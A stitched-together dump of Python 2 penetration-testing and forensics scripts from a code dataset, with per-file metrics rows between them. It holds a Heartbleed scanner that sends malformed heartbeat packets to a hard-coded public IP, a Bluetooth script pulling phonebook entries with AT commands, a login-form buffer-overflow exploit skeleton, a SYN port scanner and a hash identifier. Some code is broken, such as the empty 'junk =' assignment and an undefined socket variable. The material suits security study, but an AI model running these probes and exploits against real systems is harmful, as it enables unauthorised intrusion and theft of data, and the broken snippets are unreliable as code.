hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115020")
def SHA256HMAC():
hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115120")
def Haval256():
hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115040")
def Haval256HMAC():
hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115140")
def GOSTR341194():
hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115060")
def RipeMD256():
hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115080")
def RipeMD256HMAC():
hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115160")
def SNEFRU256():
hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115100")
def SNEFRU256HMAC():
hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115180")
def SHA256md5pass():
hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115200")
def SHA256sha1pass():
hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115220")
def MD5passsaltjoomla2():
hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0:
jerar.append("116020")
def SAM():
hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0:
jerar.append("116040")
def SHA256Django():
hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0:
jerar.append("117020")
def RipeMD320():
hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("118020")
def RipeMD320HMAC():
hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("118040")
def SHA384():
hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("119020")
def SHA384HMAC():
hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("119040")
def SHA256s():
hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0:
jerar.append("120020")
def SHA384Django():
hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0:
print " [+] SHA-384(Django)"
jerar.append("121020")
def SHA512():
hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("122020")
def SHA512HMAC():
hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("122060")
def Whirlpool():
hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("122040")
def WhirlpoolHMAC():
hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("122080")
print logo
while True:
jerar=[]
print """
-------------------------------------------------------------------------"""
hash = raw_input(" HASH: ")
ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass()
if len(jerar)==0:
print ""
print " Not Found."
elif len(jerar)>2:
jerar.sort()
print ""
print "Possible Hashs:"
print "[+] ",algorithms[jerar[0]]
print "[+] ",algorithms[jerar[1]]
print ""
print "Least Possible Hashs:"
for a in range(int(len(jerar))-2):
print "[+] ",algorithms[jerar[a+2]]
else:
jerar.sort()
print ""
print "Possible Hashs:"
for a in range(len(jerar)):
print "[+] ",algorithms[jerar[a]]
| 57.72695 | 3,696 | 0.685879 |
PenetrationTestingScripts | #!/usr/bin/python
import sys
import struct
import socket
import select
import time
import threading
from printers import printPink,printRed
from multiprocessing.dummy import Pool
class ssl_burp(object):
def __init__(self,c):
self.config=c
self.lock=threading.Lock()
self.result=[]
self.hello = self.h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
self.hb = self.h2bin('''
18 03 02 00 03
01 40 00
''')
def h2bin(self,x):
return x.replace(' ', '').replace('\n', '').decode('hex')
def recvall(self,s, length, timeout=8):
endtime = time.time() + timeout
rdata = ''
remain = length
while remain > 0:
rtime = endtime - time.time()
if rtime < 0:
return None
r, w, e = select.select([s], [], [], 5)
if s in r:
data = s.recv(remain)
# EOF?
if not data:
return None
rdata += data
remain -= len(data)
return rdata
def recvmsg(self,s):
hdr = self.recvall(s, 5)
if hdr is None:
return None, None, None
typ, ver, ln = struct.unpack('>BHH', hdr)
pay = self.recvall(s, ln, 10)
return typ, ver, pay
def hit_hb(self,s,ip,port):
s.send(self.hb)
while True:
typ, ver, pay = self.recvmsg(s)
if typ is None:
return False
if typ == 24:
if len(pay) > 3:
self.lock.acquire()
printRed('WARNING: %s ssl at %s returned more data than it should - server is vulnerable!\r\n' %(ip,port))
self.result.append('WARNING: %s ssl at %s returned more data than it should - server is vulnerable!\r\n' %(ip,port))
self.lock.release()
else:
self.lock.acquire()
printRed('%s ssl at %s processed malformed heartbeat, but did not return any extra data.\r\n' %(ip,port))
self.result.append('%s ssl at %s processed malformed heartbeat, but did not return any extra data.\r\n' %(ip,port))
self.lock.release()
return True
if typ == 21:
return False
def openssl_test(self,ip,port):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sys.stdout.flush()
s.connect((ip, port))
sys.stdout.flush()
s.send(self.hello)
sys.stdout.flush()
while True:
typ, ver, pay = self.recvmsg(s)
if typ == None:
break
# Look for server hello done message.
if typ == 22 and ord(pay[0]) == 0x0E:
break
sys.stdout.flush()
s.send(self.hb)
self.hit_hb(s,ip,port)
except Exception,e:
#print e
pass
def run(self,ipdict,pinglist,threads,file):
if len(ipdict['ssl']):
printPink("crack ssl now...")
print "[*] start test openssl_heart %s" % time.ctime()
starttime=time.time()
pool=Pool(threads)
for ip in ipdict['ssl']:
pool.apply_async(func=self.openssl_test,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
pool.close()
pool.join()
print "[*] stop ssl serice %s" % time.ctime()
print "[*] crack ssl done,it has Elapsed time:%s " % (time.time()-starttime)
for i in xrange(len(self.result)):
self.config.write_file(contents=self.result[i],file=file)
if __name__ == '__main__':
import sys
sys.path.append("../")
from comm.config import *
c=config()
ipdict={'ssl': ['222.22.224.142:443']}
pinglist=['122.225.81.129']
test=ssl_burp(c)
test.run(ipdict,pinglist,50,file="../result/test")
| 32.773973 | 136 | 0.495943 |
cybersecurity-penetration-testing | import argparse
import json
import logging
import sys
import os
import urllib2
import unix_converter as unix
__author__ = 'Preston Miller & Chapin Bryce'
__date__ = '20150920'
__version__ = 0.02
__description__ = 'This scripts downloads address transactions using blockchain.info public APIs'
def main(address):
"""
The main function handles coordinating logic
:param address: The Bitcoin Address to lookup
:return: Nothing
"""
logging.info('Initiated program for {} address'.format(address))
logging.info('Obtaining JSON structured data from blockchain.info')
raw_account = getAddress(address)
account = json.loads(raw_account.read())
printTransactions(account)
def getAddress(address):
"""
The getAddress function uses the blockchain.info Data API to pull
pull down account information and transactions for address of interest
:param address: The Bitcoin Address to lookup
:return: The response of the url request
"""
url = 'https://blockchain.info/address/{}?format=json'.format(address)
try:
return urllib2.urlopen(url)
except urllib2.URLError, e:
logging.error('URL Error for {}'.format(url))
if hasattr(e, 'code') and hasattr(e, 'headers'):
logging.debug('{}: {}'.format(e.code, e.reason))
logging.debug('{}'.format(e.headers))
print 'Received URL Error for {}'.format(url)
logging.info('Program exiting...')
sys.exit(1)
def printTransactions(account):
"""
The print_transaction function is responsible for presenting transaction details to end user.
:param account: The JSON decoded account and transaction data
:return: Nothing
"""
logging.info('Printing account and transaction data to console.')
printHeader(account)
print 'Transactions'
for i, tx in enumerate(account['txs']):
print 'Transaction #{}'.format(i)
print 'Transaction Hash:', tx['hash']
print 'Transaction Date: {}'.format(unix.unixConverter(tx['time']))
for output in tx['out']:
inputs = getInputs(tx)
if len(inputs) > 1:
print '{} --> {} ({:.8f} BTC)'.format(' & '.join(inputs), output['addr'], output['value'] * 10**-8)
elif len(inputs) == 1:
print '{} --> {} ({:.8f} BTC)'.format(''.join(inputs), output['addr'], output['value'] * 10**-8)
else:
logging.warn('Detected 0 inputs for transaction {}').format(tx['hash'])
print 'Detected 0 inputs for transaction.'
print '{:=^22}\n'.format('')
def printHeader(account):
"""
The printHeader function prints overall header information
containing basic address information.
:param account: The JSON decoded account and transaction data
:return: Nothing
"""
print 'Address:', account['address']
print 'Current Balance: {:.8f} BTC'.format(account['final_balance'] * 10**-8)
print 'Total Sent: {:.8f} BTC'.format(account['total_sent'] * 10**-8)
print 'Total Received: {:.8f} BTC'.format(account['total_received'] * 10**-8)
print 'Number of Transactions:', account['n_tx']
print '{:=^22}\n'.format('')
def getInputs(tx):
"""
The getInputs function is a small helper function that returns
input addresses for a given transaction
:param tx: A single instance of a Bitcoin transaction
:return: inputs, a list of inputs
"""
inputs = []
for input_addr in tx['inputs']:
inputs.append(input_addr['prev_out']['addr'])
return inputs
if __name__ == '__main__':
# Run this code if the script is run from the command line.
parser = argparse.ArgumentParser(description='BTC Address Lookup', version=str(__version__),
epilog='Developed by ' + __author__ + ' on ' + __date__)
parser.add_argument('ADDR', help='Bitcoin Address')
parser.add_argument('-l', help='Specify log directory. Defaults to current working directory.')
args = parser.parse_args()
# Set up Log
if args.l:
if not os.path.exists(args.l):
os.makedirs(args.l)
log_path = os.path.join(args.l, 'btc_addr_lookup.log')
else:
log_path = 'btc_addr_lookup.log'
logging.basicConfig(filename=log_path, level=logging.DEBUG,
format='%(asctime)s | %(levelname)s | %(message)s', filemode='w')
logging.info('Starting Bitcoin Address Lookup v.' + str(__version__))
logging.debug('System ' + sys.platform)
logging.debug('Version ' + sys.version)
# Print Script Information
print '{:=^22}'.format('')
print '{} {}'.format('Bitcoin Address Lookup, ', __version__)
print '{:=^22} \n'.format('')
# Run main program
main(args.ADDR)
| 35.348485 | 115 | 0.625808 |
Penetration-Testing-with-Shellcode | #!/usr/bin/python
import socket
junk =
payload="username="+junk+"&password=A"
buffer="POST /login HTTP/1.1\r\n"
buffer+="Host: 192.168.129.128\r\n"
buffer+="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\n"
buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buffer+="Accept-Language: en-US,en;q=0.5\r\n"
buffer+="Referer: http://192.168.129.128/login\r\n"
buffer+="Connection: close\r\n"
buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
buffer+="Content-Length: "+str(len(payload))+"\r\n"
buffer+="\r\n"
buffer+=payload
s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.129.128", 80))
s.send(buffer)
s.close()
| 28 | 94 | 0.696133 |
Python-Penetration-Testing-Cookbook | import pyshark
cap = pyshark.FileCapture('sample.pcap')
print(cap)
print(cap[0])
print(dir(cap[0]))
for pkt in cap:
print(pkt.highest_layer) | 16.875 | 40 | 0.732394 |
cybersecurity-penetration-testing | # Guidance Test Python Application
# pyBasic.py
#
# Author: C. Hosmer
# Python Fornesics, Inc.
#
# May 2015
# Version 1.0
#
'''
Copyright (c) 2015 Chet Hosmer, Python Forensics
Permission is hereby granted, free of charge, to any person obtaining a copy of this software
and associated documentation files (the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
'''
import argparse # Python Standard Library : Argument Parsing
import time # Python Standard Library : Time methods
import os # Python Standard Library : Operating System Methods
parser = argparse.ArgumentParser()
parser.add_argument('file')
args = parser.parse_args()
theFile = args.file
print "Test Python Application integrated with EnCase v7"
# get the file statistics
theFileStat = os.stat(theFile)
# get the MAC Times and store them in a list
macTimes = []
macTimes.append(time.ctime(theFileStat.st_mtime))
macTimes.append(time.ctime(theFileStat.st_atime))
macTimes.append(time.ctime(theFileStat.st_ctime))
# get and store the File size
fileSize = theFileStat.st_size
print "Filename : ", theFile
print "Filesize : ", fileSize
print "Last Modified: ", macTimes[0]
print "Last Access : ", macTimes[1]
print "Created : ", macTimes[2]
| 29.350877 | 103 | 0.705032 |
cybersecurity-penetration-testing | #!/usr/bin/python
import string
input = raw_input("Please enter the value you would like to Atbash Ciper: ")
transform = string.maketrans(
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz",
"ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba")
final = string.translate(input, transform)
print final | 24.833333 | 76 | 0.81877 |
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
import bluetooth
tgtPhone = 'AA:BB:CC:DD:EE:FF'
port = 17
phoneSock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
phoneSock.connect((tgtPhone, port))
for contact in range(1, 5):
atCmd = 'AT+CPBR=' + str(contact) + '\n'
phoneSock.send(atCmd)
result = client_sock.recv(1024)
print '[+] ' + str(contact) + ' : ' + result
sock.close()
| 19.789474 | 55 | 0.639594 |
cybersecurity-penetration-testing | import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
import sys
from scapy.all import *
if len(sys.argv) !=4:
print "usage: %s target startport endport" % (sys.argv[0])
sys.exit(0)
target = str(sys.argv[1])
startport = int(sys.argv[2])
endport = int(sys.argv[3])
print "Scanning "+target+" for open TCP ports\n"
if startport==endport:
endport+=1
for x in range(startport,endport):
packet = IP(dst=target)/TCP(dport=x,flags="S")
response = sr1(packet,timeout=0.5,verbose=0)
if response.haslayer(TCP) and response.getlayer(TCP).flags == 0x12:
print "Port "+str(x)+" is open!"
sr(IP(dst=target)/TCP(dport=response.sport,flags="R"),timeout=0.5, verbose=0)
print "Scan complete!\n" | 30.5 | 82 | 0.668874 |